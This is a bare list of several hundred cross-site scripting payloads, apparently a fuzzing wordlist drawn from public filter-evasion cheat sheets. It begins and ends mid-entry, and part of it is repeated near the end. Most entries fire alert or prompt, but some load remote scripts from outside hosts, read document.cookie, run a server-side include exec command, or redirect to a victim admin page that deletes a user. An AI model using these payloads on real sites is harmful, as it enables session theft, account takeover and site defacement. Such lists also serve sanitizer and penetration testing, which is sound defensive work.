onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +‘; alert(1); +‘)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(‘XSS’)> +<IMG SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(‘XSS’)> +<img src=xss onerror=alert(1)> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a 